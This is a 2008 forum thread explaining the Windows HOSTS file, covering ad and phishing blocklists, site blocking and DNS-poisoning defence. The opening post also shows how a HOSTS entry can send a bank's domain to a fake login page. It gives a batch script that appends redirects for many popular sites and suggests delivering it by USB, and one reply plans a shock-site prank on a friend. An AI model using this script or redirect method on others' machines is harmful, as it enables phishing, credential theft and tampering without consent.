sablefoxx Posted April 5, 2008 Posted April 5, 2008 The Newbie's Guide to the HOSTS File Let me just say, this isn't a 'hack' but its good to know what the HOSTS file is how it can be used for good and evil. What is the HOSTS file? The HOSTS file is basically a DNS, thats what takes those URLs (those 'www.namehere.com' things) and coverts them the IP addresses. This is generally done by a DNS Server controlled by the ISP, however with windows/linux before the computer checks with the DNS server it first checks the HOSTS file for an entry. Because this is a change to Windows it will effect all browsers, IE, Firefox, etc. Practical Uses: The HOSTS file is stored in %systemroot%driversetc (windows xp/vista only). Change to this directory and open the hosts file in notepad to edit it. It is likely that it only contains one or two entries that look something like this:127.0.0.1 localhost ::1 localhost However some anti-virus programs use this file to store a 'blacklist' of bad websites you'd never want to actually goto (like phising sites). If this is so the hosts will contain something like this: 127.0.0.1 localhost 127.0.0.1 www.usbank.freehosting.com ::1 localhost So instead of going to 'www.usbank.freehosting.com' you goto 127.0.0.1 (your machine) which is prbly not running an HTTP server and thus you get a 'can not find server' error and YAY the virus has been stopped. You can find large pre-made blacklists all over the internet. Like these that blocks ads ( http://www.hosts-file.net/?s=Download ) This trait can also be used for censorship (though not extremely effective). Say you're an employer and wanted to prevent access to myspace.com from your computers, simply add an entry for myspace like so: 127.0.0.1 localhost 127.0.0.1 www.myspace.com ::1 localhost And now the computer will not connect to myspace.com anymore (unless they use a proxy/edit the hosts).The Dark Side: We can also abuse this trait of windows to re-direct a user to a website we control, like so: 127.0.0.1 localhost 75.126.15.21 www.usbank.com ::1 localhost Now when the user types in 'www.usbank.com' they will goto 75.126.15.21, which could be anything we want, (even a fake usbank.com used to gather logins)Customize the HOSTS file: First find the IP address of the website you want the user to end up at to do this open up a command prompt and type "tracert [website here]". For example if we wanted to redirect traffic from yahoo.com to google.com. First we must get google's IP so we would type "tracert www.google.com" revealing the IP "64.233.167.147" so in the HOSTS we want to enter: 64.233.167.147 www.yahoo.com Now all yahoo traffic will end up at google :) Or we can automate the process with a simple .bat script like so:Auto-Patch the Hosts File to do Your Will (Copy paste this text into a word document and save as autohosts.bat) @echo off cls echo Patching HOSTS file... cd %systemroot% cd system32 cd drivers cd etc :: Add your own redirects! Here is the syntax :: echo [IP] [URL] >>hosts :: When a person types in the URL above they will get redirected to the IP echo 75.126.15.21 www.google.com >>hosts echo 75.126.15.21 www.digg.com >>hosts echo 75.126.15.21 www.yahoo.com >>hosts echo 75.126.15.21 www.gmail.com >>hosts echo 75.126.15.21 www.slashdot.org >>hosts echo 75.126.15.21 www.youtube.com >>hosts echo 75.126.15.21 www.cnn.com >>hosts echo 75.126.15.21 www.walmart.com >>hosts echo 75.126.15.21 www.foxnews.com >>hosts echo 75.126.15.21 www.ebay.com >>hosts echo 75.126.15.21 www.wikipedia.org >>hosts echo 75.126.15.21 www.myspace.com >>hosts echo 75.126.15.21 www.facebook.com >>hosts echo 75.126.15.21 www.bestbuy.com >>hosts echo 75.126.15.21 www.aol.com >>hosts echo 75.126.15.21 www.nytimes.com >>hosts echo 75.126.15.21 www.symantec.com >>hosts echo 75.126.15.21 www.hotmail.com >>hosts echo 75.126.15.21 www.msn.com >>hosts echo 75.126.15.21 www.imbd.com >>hosts echo 75.126.15.21 www.microsoft.com >>hosts echo done! exit :: i can see the rick roles alrdy This will re-direct some of the most commonly visited websites on the internet to the target IP :) this could even be integrated with a USB payload if one desired so :) and guys be mature dont set up your friends computer to goto tubgirl or meatspin ;)More Information:Check out 'Security Now Ep. #45 >> http://www.grc.com/securitynow.htm#45Wikipedia Article (much better then mine)>> http://en.wikipedia.org/wiki/Hosts_file Have Fun! Sparda Makes a Good Point: Can I just be clear for a moment, the hosts file doesn't redirect and should not be viewed as such (if you do view it as a way of redirecting a browser, then a DNS servers lookup would also be classifiable as a redirect). The hosts file servers as a way of perminantly pointing a host name to an IP address. It has a genuin use in security. The main of which been that if you know the IP address of a named server will never chance, you might want to enter this into the hosts file becasue then your computer isn't relying on a third party service to know it is going to the correct address. Doing this prevents DNS poisoning via a man in the middle attack. They still could pretend to be the 'trusted' IP address if they where able, but now they have to beable to modifiy the routes to the trusted IP address rather than just responding malitiusly to a DNS query. "Any thing you can do the slow dow nthe bad guys is a good thing" -- Pauldotcom Perhaps 'Misdirect' is a better choice of words Quote
digip Posted April 5, 2008 Posted April 5, 2008 Not to be a dick, but the HOSTS file is pretty common knowledge among windows users and is often targeted by Virii to block you from being able to update your virus definitions and also keep you from getting microsoft updates. There are a lot of threads that already talk about th HOSTS file too, and I have even posted my personal HOSTS file in one of them a while ago. Also, there are different paths for the HOSTS file depending on the version of Windows your running. Anything older than XP stores it in the c:windows folder or the %windir% on the current drive (This is Windows 95, Windows 98) . XP Pro/NT/Windows2000 is in c:winntsystem32driversetchosts, while all other versions of XP other than XP Pro are in c:windowssystem32driversetchosts, Server 2003 and Vista I think are c:windowssystem32driversetc but I can not confirm this on Server 2003 and Vista since I am not running them at the moment. A quick google will probably give you the path though. Quote
sablefoxx Posted April 5, 2008 Author Posted April 5, 2008 Not to be a dick, but the HOSTS file is pretty common knowledge among windows users Actually thats what i thought but like the last 20 people i've talked to had no idea about it. This is more a newbie's guide to the hosts file (its not that complicated) Quote
PrototypeShogun Posted June 4, 2008 Posted June 4, 2008 Years ago when I moved to a new city and didn't have internet, but still wanted to work on webpages and have them viewable on the network... I edited all the hosts files on the computers to direct the url to the ip of my computer on the network. It was easier then editing wamp to let anyone on the network view it.... remember I didn't have internet. Hope that opens some minds as to weird macgyver uses for the hosts file. Quote
MRGRIM Posted June 5, 2008 Posted June 5, 2008 Nothing I didn' already know, but a deccent article none the less tubgirl comment made me chuckle - sometimes the easier the prank the better ;) Quote
Taulmarill Posted June 5, 2008 Posted June 5, 2008 Linux and most *NIX OSs have a similar file located at /etc/hosts. And remember, this does not only affect browsers but every program that performs dns lookups. Quote
Rotting Corpse Posted June 5, 2008 Posted June 5, 2008 I didn't know about HOST files till I read this thread! Very interesting, I might just try the tubgirl prank on my friend next time I'm at his house! Quote
digip Posted June 5, 2008 Posted June 5, 2008 Here is a good one for ad blocking and general crapware: http://www.mvps.org/winhelp2002/hosts.txt I use this in addition to my own list of sites I block. Quote
Rab Posted June 6, 2008 Posted June 6, 2008 Yea I use the HOSTS file every day, but yeah I guess this helps people learn. There are plenty of things on Hak5 I didn't know about before, so it's all fair game. Quote
Sparda Posted June 6, 2008 Posted June 6, 2008 Can I just be clear for a moment, the hosts file doesn't redirect and should not be viewed as such (if you do view it as a way of redirecting a browser, then a DNS servers lookup would also be classifiable as a redirect). The hosts file servers as a way of perminantly pointing a host name to an IP address. It has a genuin use in security. The main of which been that if you know the IP address of a named server will never chance, you might want to enter this into the hosts file becasue then your computer isn't relying on a third party service to know it is going to the correct address. Doing this prevents DNS poisoning via a man in the middle attack. They still could pretend to be the 'trusted' IP address if they where able, but now they have to beable to modifiy the routes to the trusted IP address rather than just responding malitiusly to a DNS query. "Any thing you can do the slow dow nthe bad guys is a good thing" -- Pauldotcom bad spelling and obviuse mistakes = GB spell checking + firefox + windows = fail Quote
digip Posted June 7, 2008 Posted June 7, 2008 Read up - http://www.0x000000.com/?i=562 It's a pretty nasty(and simple) sploit, but this only works on IE. Even though it says its javascript, its actually VBScript. fso writes will not run on Opera (or FireFox as far as I know). Unless you have your IE browser set to allow all active-x and scripting, you should get an alert prompt or the yellow bar explaining it wants to block it from running and you have to manually allow it. Then again, an active-x sploit with this as the payload might go undetected. I have my firewall set up to not allow changes to the hosts file, so either way, I get alerted if something tries to write to or change it. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.